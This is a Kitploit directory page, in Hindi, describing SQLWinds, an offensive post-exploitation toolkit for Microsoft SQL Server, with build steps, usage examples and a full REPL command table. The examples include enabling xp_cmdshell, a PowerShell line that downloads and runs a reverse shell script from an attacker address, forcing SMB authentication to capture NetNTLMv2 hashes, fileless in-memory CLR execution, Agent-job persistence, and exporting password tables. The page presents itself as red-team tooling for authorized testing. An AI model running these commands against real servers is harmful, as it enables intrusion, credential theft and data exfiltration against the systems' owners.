Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
sqlwinds — SQLWinds - SQL Server सुरक्षा मूल्यांकन और पोस्ट-एक्सप्लॉइटेशन टूलकिट | Kitploit
उपकरण/GitHubGitHub/blue0x1/sqlwinds
विशेषाधिकार वृद्धिस्थायित्व तंत्रशोषणपार्श्व आंदोलनकॉन्फ़िगरेशन ऑडिटिंगडेटा निष्कासनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगडेटाबेस सुरक्षा
GitHubblue0x1/sqlwinds

sqlwinds

11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SQLWinds - SQL Server सुरक्षा मूल्यांकन और पोस्ट-एक्सप्लॉइटेशन टूलकिट

रिपॉजिटरी देखें

SQLWinds

SQL सुरक्षा मूल्यांकन और पोस्ट-एक्सप्लॉइटेशन टूलकिट

SQLWinds Microsoft SQL Server के सुरक्षा परीक्षण और शोषण के लिए एक कमांड-लाइन टूल है। यह एक इंटरैक्टिव वातावरण प्रदान करता है जिससे सर्वरों का गहन विश्लेषण, विशेषाधिकार वृद्धि, हमले निष्पादित करना, और नेटवर्क में पिवट करना संभव होता है — सभी विशेष कमांड्स के साथ, जैसे इन-मेमोरी कोड निष्पादन और SCCM डेटाबेस अन्वेषण।


SQLWinds


📖 दस्तावेज़ और संसाधन

Wiki Issues Releases

त्वरित लिंक:

  • पूर्ण दस्तावेज़ और Wiki - संपूर्ण उपयोग गाइड और कमांड संदर्भ
  • कोई समस्या रिपोर्ट करें - कोई बग मिला या फीचर अनुरोध है?
  • नवीनतम रिलीज़ - नवीनतम संस्करण डाउनलोड करें

विशेषताएँ

  • विविध प्रमाणीकरण: SQL, Windows Integrated (--integrated), और Kerberos delegation (--kerberos with --user/--pass) समर्थन करता है।
  • व्यापक एन्यूमरेशन:
    • सर्वर जानकारी, डेटाबेस, टेबल, कॉलम, उपयोगकर्ता और अनुमतियाँ।
    • सुरक्षा कॉन्फ़िगरेशन ऑडिट (xp_cmdshell, CLR, OLE, आदि)।
    • संवेदनशील डेटा खोज और गुप्त डेटा निष्कर्षण।
    • लिंक्ड सर्वर एन्यूमरेशन और शोषण।
  • पोस्ट-एक्सप्लॉइटेशन और लेटरल मूवमेंट:
    • कोड निष्पादन: xp_cmdshell, OLE Automation Procedures (sp_oacreate), और CLR इंटीग्रेशन सक्षम करें और उपयोग करें।
    • इन-मेमोरी CLR: फ़ाइलों को डिस्क पर डाले बिना .NET असेंबलियों को सीधे मेमोरी से लोड और निष्पादित करें (:memclr)।
    • क्रेडेंशियल चोरी: रिले हमलों के लिए UNC पथ पर SMB प्रमाणीकरण बाध्य करें (:unc_smb)।
    • रेजिस्ट्री इंटरैक्शन: xp_regread के माध्यम से रेजिस्ट्री कुंजियाँ और मान पढ़ें।
    • पर्सिस्टेंस: SQL Agent Jobs बनाएं, सूचीबद्ध करें और निष्पादित करें।
    • डेटा एक्सफिल्ट्रेशन: फ़ाइलें अपलोड/डाउनलोड करें और क्वेरी परिणामों को CSV/JSON में निर्यात करें।

स्थापना और संकलन

त्वरित बिल्ड

रिपॉजिटरी में Windows पर आसान संकलन के लिए build.bat स्क्रिप्ट शामिल है:

root@kitploit:~
.\build.bat

संकलित SQLWinds.exe निष्पादन योग्य फ़ाइल bin\Release\ निर्देशिका में रखी जाएगी।

मैन्युअल बिल्ड

  1. सुनिश्चित करें कि आपके पास .NET Framework (≥ 4.6.1) या .NET SDK स्थापित है।
  2. रिपॉजिटरी क्लोन करें:
    root@kitploit:~
    git clone https://github.com/blue0x1/sqlwinds.git
    cd sqlwinds
    
  3. समाधान संकलित करें:
    root@kitploit:~
    msbuild SQLWinds.sln /p:Configuration=Release
    

उपयोग

बेसिक कनेक्शन

root@kitploit:~
# SQL Authentication
SQLWinds.exe --server TARGET\\INSTANCE --user sa --pass Password123

# Windows Authentication (Current User Context)
SQLWinds.exe --server sql01.corp.local --integrated

# Kerberos Delegation (with provided credentials)
SQLWinds.exe --server sql01.prod.corp.local --kerberos --user CORP\\svc_sql --pass SvcPass123!

# Connect and run a single command
SQLWinds.exe --server 10.0.0.5 --user sa --pass pass --run-cmd "SELECT name FROM sys.databases"

सामान्य कमांड-लाइन विकल्प

इंटरैक्टिव REPL मोड

root@kitploit:~
sqlwinds> :info
sqlwinds> :dbs
sqlwinds> :users
sqlwinds> :enable_xp_cmdshell
sqlwinds> :xp whoami
sqlwinds> :spn
sqlwinds> help

संपूर्ण REPL कमांड संदर्भ

उदाहरण: बड़ी स्क्रिप्ट के लिए :plain का उपयोग

:plain कमांड बड़ी, बहु-पंक्ति SQL स्क्रिप्ट निष्पादित करने के लिए आवश्यक है।

root@kitploit:~
sqlwinds> :plain
SQL> 
SQL> BEGIN TRY
.....>     SELECT * FROM [VeryImportantTable];
.....>     EXEC sp_configure 'show advanced options', 1;
.....>     RECONFIGURE;
.....> END TRY
.....> BEGIN CATCH
.....>     SELECT ERROR_MESSAGE();
.....> END CATCH
.....> :execute
  1. :plain टाइप करें और Enter दबाएँ।
  2. अपनी पूरी SQL स्क्रिप्ट पेस्ट करें या टाइप करें।
  3. एक नई पंक्ति पर, पूरी स्क्रिप्ट चलाने के लिए :execute टाइप करें या रद्द करने के लिए :cancel टाइप करें।

उदाहरण

1. ऑडिट

root@kitploit:~
SQLWinds.exe --server dc01 --integrated --security-audit 

2. कोड निष्पादन के लिए xp_cmdshell का उपयोग

root@kitploit:~
SQLWinds.exe --server 192.168.1.15 --user sa --pass pass --enable-xp-cmdshell
# In the REPL that opens:
sqlwinds> :xp whoami /all
sqlwinds> :xp powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.10/revshell.ps1')"

3. इन-मेमोरी CLR निष्पादन (फ़ाइललेस)

root@kitploit:~
# Compile your .NET assembly to a DLL (e.g., CommandExecutor.dll)
sqlwinds> :enable_clr
sqlwinds> :memclr "C:\Tools\CommandExecutor.dll" "CommandExecutor.Class1" "Exec" "whoami"

4. SRelay के माध्यम से NetNTLMv2 हैश चुराना

root@kitploit:~
# On your machine: sudo responder -I tun0
sqlwinds> :unc_smb \\10.10.15.10\fake_share

5. SCCM डेटाबेस शोषण

root@kitploit:~
SQLWinds.exe --server sccmdb.corp.local --integrated
sqlwinds> :sccm_info
sqlwinds> :sccm_collections
sqlwinds> :sccm_application "Microsoft 365"

6. डेटा एक्सफिल्ट्रेशन

root@kitploit:~
# Export sensitive data to CSV
sqlwinds> :exportcsv "SELECT username, password FROM users" credentials.csv

# Download a file stored in the database
sqlwinds> :download "SELECT file_data FROM documents WHERE id=1" secret.docx

🤝 योगदान और सहायता

हम योगदान का स्वागत करते हैं! यदि आपके पास सुधार के विचार हैं या कोई समस्या मिलती है:

  1. दस्तावेज़ीकरण के लिए Wiki देखें
  2. डुप्लिकेट से बचने के लिए मौजूदा Issues खोजें
  3. अपने सुझाव या बग रिपोर्ट के बारे में विस्तृत जानकारी के साथ एक नया issue बनाएं

⚠️ अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके मालिक आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास नहीं है, अवैध है। डेवलपर्स इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए कोई दायित्व नहीं लेते हैं और ज़िम्मेदार नहीं हैं।


श्रेय

विकसित: blue0x1।

टूल डाउनलोड करें
  • SCCM डेटाबेस इंटरैक्शन: (यदि लक्ष्य डेटाबेस SCCM है)
    • SCCM का पता लगाएं और संस्करण/साइट जानकारी रिपोर्ट करें।
    • हार्डवेयर, सॉफ़्टवेयर, कलेक्शन और डिप्लॉयमेंट की सूची बनाएं।
    • SCCM-विशिष्ट सुरक्षा ऑडिट करें।
  • Kerberos विश्लेषण: Kerberos प्रमाणीकरण समस्या निवारण के लिए लक्ष्य से जुड़े SPNs हेतु Active Directory जाँचें।
  • इंस्टेंस डिस्कवरी: डोमेन पर उपलब्ध SQL Server इंस्टेंस एन्यूमरेट करें।
  • उन्नत REPL: ऑटो-कम्प्लीशन और कमांड इतिहास के साथ इंटरैक्टिव वातावरण।
  • OptionDescription
    --serverलक्ष्य सर्वर (IP, होस्टनाम, इंस्टेंस)। आवश्यक।
    --user, --passSQL या Windows प्रमाणीकरण के लिए क्रेडेंशियल्स।
    --integratedप्रमाणीकरण के लिए वर्तमान Windows टोकन उपयोग करें।
    --kerberosKerberos प्रमाणीकरण प्रवाह का उपयोग करें।
    --spn-checkलक्ष्य होस्ट के लिए AD में SPNs जाँचें।
    --run-cmd "<SQL>"एकल SQL कमांड निष्पादित करें और बाहर निकलें।
    --run-file file.sqlफ़ाइल से SQL स्क्रिप्ट निष्पादित करें और बाहर निकलें।
    --infoव्यापक सर्वर जानकारी एकत्र करें और प्रदर्शित करें।
    --getinstanceडोमेन में SQL इंस्टेंस खोजें और बाहर निकलें।
    --list-dbsडेटाबेस सूचीबद्ध करें और बाहर निकलें।
    --security-auditसुरक्षा ऑडिट करें और बाहर निकलें।
    CommandDescriptionExample
    :infoविस्तृत सर्वर जानकारी दिखाएं:info
    :dbsविवरण के साथ सभी डेटाबेस सूचीबद्ध करें:dbs
    :tables [db] [schema]डेटाबेस/स्कीमा में टेबल सूचीबद्ध करें:tables master dbo
    :columns <table> [schema] [db]किसी टेबल के कॉलम सूचीबद्ध करें:columns Users dbo MyDatabase
    :usersसभी SQL लॉगिन और डेटाबेस उपयोगकर्ता सूचीबद्ध करें:users
    :permsवर्तमान उपयोगकर्ता अनुमतियाँ दिखाएं:perms
    :auditसुरक्षा कॉन्फ़िगरेशन ऑडिट करें:audit
    :search [term]संवेदनशील डेटा खोजें:search password
    :secretsसंभावित गुप्त डेटा निकालें:secrets
    :servicesSQL Server सेवा खाते दिखाएं:services
    :spnलक्ष्य होस्ट के लिए SPNs जाँचें:spn
    :enable_xp_cmdshellxp_cmdshell सक्षम करें:enable_xp_cmdshell
    :disable_xp_cmdshellxp_cmdshell अक्षम करें:disable_xp_cmdshell
    :xp <command>xp_cmdshell के माध्यम से OS कमांड चलाएं:xp whoami
    :enable_oleOLE Automation सक्षम करें:enable_ole
    :disable_oleOLE Automation अक्षम करें:disable_ole
    :ole_cmd <command>OLE के माध्यम से OS कमांड चलाएं:ole_cmd "calc.exe"
    :enable_clrCLR इंटीग्रेशन सक्षम करें:enable_clr
    :disable_clrCLR इंटीग्रेशन अक्षम करें:disable_clr
    :deploy-clr <path>फ़ाइल से CLR असेंबली तैनात करें:deploy-clr C:\Tools\cmd.dll
    :list-assembliesतैनात CLR असेंबलियाँ सूचीबद्ध करें:list-assemblies
    :clr_execCLR विधि निष्पादित करें:clr_exec MyAssembly MyClass Method arg1
    :memclrमेमोरी से CLR असेंबली निष्पादित करें:memclr "C:\Tools\exec.dll" "Namespace.Class" "Method" "arg"
    :remove-assembly <name>CLR असेंबली हटाएं:remove-assembly MyAssembly
    :list_linkserversलिंक्ड सर्वर सूचीबद्ध करें:list_linkservers
    :linkrpc <srv> <cmd>लिंक्ड सर्वर के माध्यम से कमांड निष्पादित करें:linkrpc LINKEDSRV "whoami"
    :impersonate <login>SQL लॉगिन का प्रतिरूपण करें:impersonate sa
    :revertसुरक्षा संदर्भ वापस लाएं:revert
    :agent_jobSQL Agent जॉब प्रबंधित करें:agent_job create MyJob "whoami"
    :ls [path]SQL के माध्यम से निर्देशिका सूचीबद्ध करें:ls C:\Windows\Temp
    :unc_smb <path>UNC पर SMB प्रमाणीकरण बाध्य करें:unc_smb \\192.168.1.100\share
    :plainबड़ी SQL स्क्रिप्ट पेस्ट करें(नीचे उदाहरण देखें)
    :regreadरेजिस्ट्री मान पढ़ें:regread HKEY_LOCAL_MACHINE Software\Microsoft value
    :regread_allकुंजी में सभी मान सूचीबद्ध करें:regread_all HKEY_LOCAL_MACHINE Software\Microsoft
    :uploadफ़ाइल को टेबल पर अपलोड करें:upload C:\file.txt MyTable
    :downloadक्वेरी से बाइनरी डाउनलोड करें:download "SELECT file FROM blobs" out.bin
    :exportcsvक्वेरी को CSV में निर्यात करें:exportcsv "SELECT * FROM users" out.csv
    :exportjsonक्वेरी को JSON में निर्यात करें:exportjson "SELECT * FROM users" out.json
    :sccm_infoSCCM डेटाबेस का पता लगाएं:sccm_info
    :sccm_inventorySCCM इन्वेंट्री दिखाएं:sccm_inventory
    :sccm_collectionsSCCM कलेक्शन सूचीबद्ध करें:sccm_collections "All Systems"
    :sccm_deploymentsडिप्लॉयमेंट दिखाएं:sccm_deployments
    :sccm_clientsक्लाइंट सूचीबद्ध करें:sccm_clients inactive
    :sccm_auditSCCM सुरक्षा ऑडिट:sccm_audit
    :sccm_applicationऐप विवरण दिखाएं:sccm_application "Google Chrome"
    helpसहायता दिखाएंhelp
    exitREPL से बाहर निकलेंexit